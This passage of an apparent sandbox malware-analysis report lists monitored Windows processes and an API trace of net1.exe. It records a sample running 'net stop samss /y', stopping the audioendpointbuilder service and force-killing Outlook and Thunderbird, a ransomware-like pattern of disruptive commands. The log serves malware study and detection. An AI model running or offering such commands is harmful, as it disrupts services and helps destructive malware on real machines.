"0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0x1358 Thread: id = 186 os_tid = 0x1178 Process: id = "14" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x52df000" os_pid = "0xf30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xa74" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0x508 Thread: id = 49 os_tid = 0xfe0 Thread: id = 105 os_tid = 0x12c8 Thread: id = 175 os_tid = 0xadc Thread: id = 177 os_tid = 0xe84 Process: id = "15" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6542000" os_pid = "0xebc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xd4c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 47 os_tid = 0xf4 Thread: id = 51 os_tid = 0xdd8 Thread: id = 89 os_tid = 0x110c Thread: id = 171 os_tid = 0x10e8 Thread: id = 176 os_tid = 0x1018 Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x59016000" os_pid = "0xe7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xb60" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 50 os_tid = 0xe74 Thread: id = 68 os_tid = 0x1068 Thread: id = 132 os_tid = 0x12e8 Thread: id = 181 os_tid = 0x364 Thread: id = 184 os_tid = 0xb64 Process: id = "17" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3bcd000" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x1240" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 64 os_tid = 0x484 Thread: id = 71 os_tid = 0x778 Thread: id = 104 os_tid = 0x12b0 Thread: id = 168 os_tid = 0x10e4 Thread: id = 174 os_tid = 0xae4 Process: id = "18" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x16dd8000" os_pid = "0xa00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM outlook.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 127 os_tid = 0xd98 Thread: id = 304 os_tid = 0x1414 Thread: id = 2222 os_tid = 0x2ff4 Thread: id = 2230 os_tid = 0x3010 Thread: id = 2242 os_tid = 0x3048 Process: id = "19" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1a105000" os_pid = "0x129c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xa00" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 167 os_tid = 0x1138 Thread: id = 172 os_tid = 0xde0 Thread: id = 182 os_tid = 0x10d4 Thread: id = 250 os_tid = 0x268 Thread: id = 279 os_tid = 0xf48 Process: id = "20" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x65d58000" os_pid = "0xd90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM thunderbird.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 173 os_tid = 0xfa4 Thread: id = 352 os_tid = 0x14d4 Thread: id = 2223 os_tid = 0x2ff8 Thread: id = 2241 os_tid = 0x3044 Thread: id = 2244 os_tid = 0x304c Process: id = "21" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1b99b000" os_pid = "0x1010" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0xd90" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 178 os_tid = 0x13c4 Thread: id = 183 os_tid = 0x1100 Thread: id = 216 os_tid = 0xdf8 Thread: id = 281 os_tid = 0x113c Thread: id = 285 os_tid = 0x484 Process: id = "22" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x825f000" os_pid = "0x13a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x7f4" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 251 os_tid = 0xc6c [0142.318] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0142.318] __set_app_type (_Type=0x1) [0142.318] __p__fmode () returned 0x76953c14 [0142.318] __p__commode () returned 0x769549ec [0142.318] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0142.318] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0142.318] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.318] GetConsoleOutputCP () returned 0x1b5 [0142.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0142.917] SetThreadUILanguage (LangId=0x0) returned 0x2ec0409 [0143.393] sprintf_s (in: _DstBuf=0x30bfc34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0143.393] setlocale (category=0, locale=".437") returned="English_United States.437" [0143.395] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0143.395] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0143.395] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" [0143.395] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30bf9dc, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0143.395] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x0, Size=0x7c) returned 0x3114450 [0143.395] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0143.395] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30bf9d8 | out: Buffer=0x30bf9d8*=0x3117cd0) returned 0x0 [0143.395] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30bf9d4 | out: Buffer=0x30bf9d4*=0x3117ce8) returned 0x0 [0143.395] __iob_func () returned 0x76952608 [0143.395] _fileno (_File=0x76952608) returned 0 [0143.395] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0143.395] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0143.395] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0143.395] _wcsicmp (_String1="config", _String2="stop") returned -16 [0143.395] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0143.395] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0143.395] _wcsicmp (_String1="file", _String2="stop") returned -13 [0143.395] _wcsicmp (_String1="files", _String2="stop") returned -13 [0143.395] _wcsicmp (_String1="group", _String2="stop") returned -12 [0143.396] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0143.396] _wcsicmp (_String1="help", _String2="stop") returned -11 [0143.396] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0143.396] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0143.396] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0143.396] _wcsicmp (_String1="session", _String2="stop") returned -15 [0143.396] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0143.396] _wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0143.396] _wcsicmp (_String1="share", _String2="stop") returned -12 [0143.396] _wcsicmp (_String1="start", _String2="stop") returned -14 [0143.396] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0143.396] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0143.396] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0143.396] _wcsicmp (_String1="accounts", _String2="audioendpointbuilder") returned -18 [0143.396] _wcsicmp (_String1="computer", _String2="audioendpointbuilder") returned 2 [0143.396] _wcsicmp (_String1="config", _String2="audioendpointbuilder") returned 2 [0143.396] _wcsicmp (_String1="continue", _String2="audioendpointbuilder") returned 2 [0143.396] _wcsicmp (_String1="cont", _String2="audioendpointbuilder") returned 2 [0143.396] _wcsicmp (_String1="file", _String2="audioendpointbuilder") returned 5 [0143.396] _wcsicmp (_String1="files", _String2="audioendpointbuilder") returned 5 [0143.396] _wcsicmp (_String1="group", _String2="audioendpointbuilder") returned 6 [0143.396] _wcsicmp (_String1="groups", _String2="audioendpointbuilder") returned 6 [0143.396] _wcsicmp (_String1="help", _String2="audioendpointbuilder") returned 7 [0143.396] _wcsicmp (_String1="helpmsg", _String2="audioendpointbuilder") returned 7 [0143.396] _wcsicmp (_String1="localgroup", _String2="audioendpointbuilder") returned 11 [0143.396] _wcsicmp (_String1="pause", _String2="audioendpointbuilder") returned 15 [0143.396] _wcsicmp (_String1="session", _String2="audioendpointbuilder") returned 18 [0143.396] _wcsicmp (_String1="sessions", _String2="audioendpointbuilder") returned 18 [0143.396] _wcsicmp (_String1="sess", _String2="audioendpointbuilder") returned 18 [0143.396] _wcsicmp (_String1="share", _String2="audioendpointbuilder") returned 18 [0143.396] _wcsicmp (_String1="start", _String2="audioendpointbuilder") returned 18 [0143.396] _wcsicmp (_String1="stats", _String2="audioendpointbuilder") returned 18 [0143.396] _wcsicmp (_String1="statistics", _String2="audioendpointbuilder") returned 18 [0143.396] _wcsicmp (_String1="stop", _String2="audioendpointbuilder") returned 18 [0143.396] _wcsicmp (_String1="time", _String2="audioendpointbuilder") returned 19 [0143.396] _wcsicmp (_String1="user", _String2="audioendpointbuilder") returned 20 [0143.396] _wcsicmp (_String1="users", _String2="audioendpointbuilder") returned 20 [0143.396] _wcsicmp (_String1="msg", _String2="audioendpointbuilder") returned 12 [0143.396] _wcsicmp (_String1="messenger", _String2="audioendpointbuilder") returned 12 [0143.396] _wcsicmp (_String1="receiver", _String2="audioendpointbuilder") returned 17 [0143.397] _wcsicmp (_String1="rcv", _String2="audioendpointbuilder") returned 17 [0143.397] _wcsicmp (_String1="netpopup", _String2="audioendpointbuilder") returned 13 [0143.397] _wcsicmp (_String1="redirector", _String2="audioendpointbuilder") returned 17 [0143.397] _wcsicmp (_String1="redir", _String2="audioendpointbuilder") returned 17 [0143.397] _wcsicmp (_String1="rdr", _String2="audioendpointbuilder") returned 17 [0143.397] _wcsicmp (_String1="workstation", _String2="audioendpointbuilder") returned 22 [0143.397] _wcsicmp (_String1="work", _String2="audioendpointbuilder") returned 22 [0143.397] _wcsicmp (_String1="wksta", _String2="audioendpointbuilder") returned 22 [0143.397] _wcsicmp (_String1="prdr", _String2="audioendpointbuilder") returned 15 [0143.397] _wcsicmp (_String1="devrdr", _String2="audioendpointbuilder") returned 3 [0143.397] _wcsicmp (_String1="lanmanworkstation", _String2="audioendpointbuilder") returned 11 [0143.397] _wcsicmp (_String1="server", _String2="audioendpointbuilder") returned 18 [0143.397] _wcsicmp (_String1="svr", _String2="audioendpointbuilder") returned 18 [0143.397] _wcsicmp (_String1="srv", _String2="audioendpointbuilder") returned 18 [0143.397] _wcsicmp (_String1="lanmanserver", _String2="audioendpointbuilder") returned 11 [0143.397] _wcsicmp (_String1="alerter", _String2="audioendpointbuilder") returned -9 [0143.397] _wcsicmp (_String1="netlogon", _String2="audioendpointbuilder") returned 13 [0143.397] _wcsupr (in: _String="audioendpointbuilder" | out: _String="AUDIOENDPOINTBUILDER") returned="AUDIOENDPOINTBUILDER" [0143.397] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x31208a0 [0143.400] GetServiceKeyNameW (in: hSCManager=0x31208a0, lpDisplayName="AUDIOENDPOINTBUILDER", lpServiceName=0x2c8c28, lpcchBuffer=0x30bf94c | out: lpServiceName="", lpcchBuffer=0x30bf94c) returned 0 [0143.968] _wcsicmp (_String1="msg", _String2="AUDIOENDPOINTBUILDER") returned 12 [0143.969] _wcsicmp (_String1="messenger", _String2="AUDIOENDPOINTBUILDER") returned 12 [0143.969] _wcsicmp (_String1="receiver", _String2="AUDIOENDPOINTBUILDER") returned 17 [0143.969] _wcsicmp (_String1="rcv", _String2="AUDIOENDPOINTBUILDER") returned 17 [0143.969] _wcsicmp (_String1="redirector", _String2="AUDIOENDPOINTBUILDER") returned 17 [0143.969] _wcsicmp (_String1="redir", _String2="AUDIOENDPOINTBUILDER") returned 17 [0143.969] _wcsicmp (_String1="rdr", _String2="AUDIOENDPOINTBUILDER") returned 17 [0143.969] _wcsicmp (_String1="workstation", _String2="AUDIOENDPOINTBUILDER") returned 22 [0143.969] _wcsicmp (_String1="work", _String2="AUDIOENDPOINTBUILDER") returned 22 [0143.969] _wcsicmp (_String1="wksta", _String2="AUDIOENDPOINTBUILDER") returned 22 [0143.969] _wcsicmp (_String1="prdr", _String2="AUDIOENDPOINTBUILDER") returned 15 [0143.969] _wcsicmp (_String1="devrdr", _String2="AUDIOENDPOINTBUILDER") returned 3 [0143.969] _wcsicmp (_String1="lanmanworkstation", _String2="AUDIOENDPOINTBUILDER") returned 11 [0143.969] _wcsicmp (_String1="server", _String2="AUDIOENDPOINTBUILDER") returned 18 [0143.969] _wcsicmp (_String1="svr", _String2="AUDIOENDPOINTBUILDER") returned 18 [0143.969] _wcsicmp (_String1="srv", _String2="AUDIOENDPOINTBUILDER") returned 18 [0143.969] _wcsicmp (_String1="lanmanserver", _String2="AUDIOENDPOINTBUILDER") returned 11 [0143.969] _wcsicmp (_String1="alerter", _String2="AUDIOENDPOINTBUILDER") returned -9 [0143.969] _wcsicmp (_String1="netlogon", _String2="AUDIOENDPOINTBUILDER") returned 13 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0143.969] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0143.970] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0143.970] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120850 [0143.970] OpenServiceW (hSCManager=0x3120850, lpServiceName="AUDIOENDPOINTBUILDER", dwDesiredAccess=0x84) returned 0x3120620 [0143.971] ResolveDelayLoadedAPI () returned 0x73f29e60 [0143.971] ControlService (in: hService=0x3120620, dwControl=0x4, lpServiceStatus=0x30bf8c8 | out: lpServiceStatus=0x30bf8c8*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0xc1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0144.224] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x3112d78 [0144.224] wcscpy_s (in: _Destination=0x3112d94, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER" | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0144.224] CloseServiceHandle (hSCObject=0x3120850) returned 1 [0144.224] CloseServiceHandle (hSCObject=0x3120620) returned 1 [0144.224] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf8ac | out: Buffer=0x30bf8ac*=0x3120320) returned 0x0 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0144.224] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0144.225] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0144.225] wcsncpy_s (in: _Destination=0x31204d6, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0144.225] wcsncpy_s (in: _Destination=0x31204ac, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0144.225] NetApiBufferFree 